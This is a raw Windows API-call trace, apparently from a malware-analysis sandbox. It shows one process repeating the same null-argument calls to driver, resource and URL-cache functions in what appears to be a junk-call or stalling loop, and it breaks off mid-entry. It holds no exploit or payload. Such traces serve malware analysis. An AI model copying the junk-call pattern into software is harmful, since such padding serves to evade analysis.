[0185.778] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.778] GetUserDefaultLangID () returned 0x409 [0185.778] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.778] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.778] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.778] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.778] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.778] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.778] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.778] GetUserDefaultLangID () returned 0x409 [0185.778] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.778] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.778] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.778] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.778] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.778] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.778] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.778] GetUserDefaultLangID () returned 0x409 [0185.779] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.779] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.779] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.779] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.779] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.779] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.779] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.779] GetUserDefaultLangID () returned 0x409 [0185.779] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.779] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.779] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.779] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.779] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.779] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.779] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.779] GetUserDefaultLangID () returned 0x409 [0185.779] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.779] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.779] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.779] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.779] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.779] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.779] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.779] GetUserDefaultLangID () returned 0x409 [0185.779] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.779] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.779] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.779] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.779] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.779] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.779] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.779] GetUserDefaultLangID () returned 0x409 [0185.779] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.779] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.779] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.780] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.780] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.780] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.780] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.780] GetUserDefaultLangID () returned 0x409 [0185.780] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.780] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.780] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.780] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.780] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.780] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.780] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.780] GetUserDefaultLangID () returned 0x409 [0185.780] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.780] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.780] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.780] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.780] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.780] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.780] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.780] GetUserDefaultLangID () returned 0x409 [0185.780] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.780] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.780] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.780] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.780] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.780] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.780] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.780] GetUserDefaultLangID () returned 0x409 [0185.780] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.780] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.780] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.780] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.781] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.781] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.781] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.781] GetUserDefaultLangID () returned 0x409 [0185.781] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.781] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.781] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.781] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.781] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.781] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.781] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.781] GetUserDefaultLangID () returned 0x409 [0185.781] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.781] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.781] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.781] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.781] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.781] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.781] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.781] GetUserDefaultLangID () returned 0x409 [0185.781] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.781] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.781] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.781] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.781] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.781] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.781] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.781] GetUserDefaultLangID () returned 0x409 [0185.781] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.781] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.781] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.781] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.781] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.781] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.781] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.781] GetUserDefaultLangID () returned 0x409 [0185.781] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.781] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.782] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.782] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.782] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.782] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.782] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.782] GetUserDefaultLangID () returned 0x409 [0185.782] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.782] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.782] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.782] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.782] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.782] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.782] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.782] GetUserDefaultLangID () returned 0x409 [0185.782] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.782] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.782] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.782] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.782] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.782] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.782] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.782] GetUserDefaultLangID () returned 0x409 [0185.782] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.782] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.782] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.782] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.782] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.782] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.782] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.782] GetUserDefaultLangID () returned 0x409 [0185.782] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.782] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.782] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.782] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.782] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.782] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.782] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.782] GetUserDefaultLangID () returned 0x409 [0185.782] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.782] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.782] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.782] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.782] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.782] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.782] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.782] GetUserDefaultLangID () returned 0x409 [0185.782] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.783] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.783] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.783] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.783] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.783] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.783] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.783] GetUserDefaultLangID () returned 0x409 [0185.783] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.783] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.783] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.783] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.783] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.903] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.903] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.903] GetUserDefaultLangID () returned 0x409 [0185.903] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.903] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.903] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.903] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.903] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.903] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.903] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.903] GetUserDefaultLangID () returned 0x409 [0185.903] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.904] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.904] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.904] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.904] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.904] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.904] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.904] GetUserDefaultLangID () returned 0x409 [0185.904] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.904] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.904] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.904] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.904] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.904] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.904] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.904] GetUserDefaultLangID () returned 0x409 [0185.904] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.904] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.904] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.904] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.904] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.904] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: 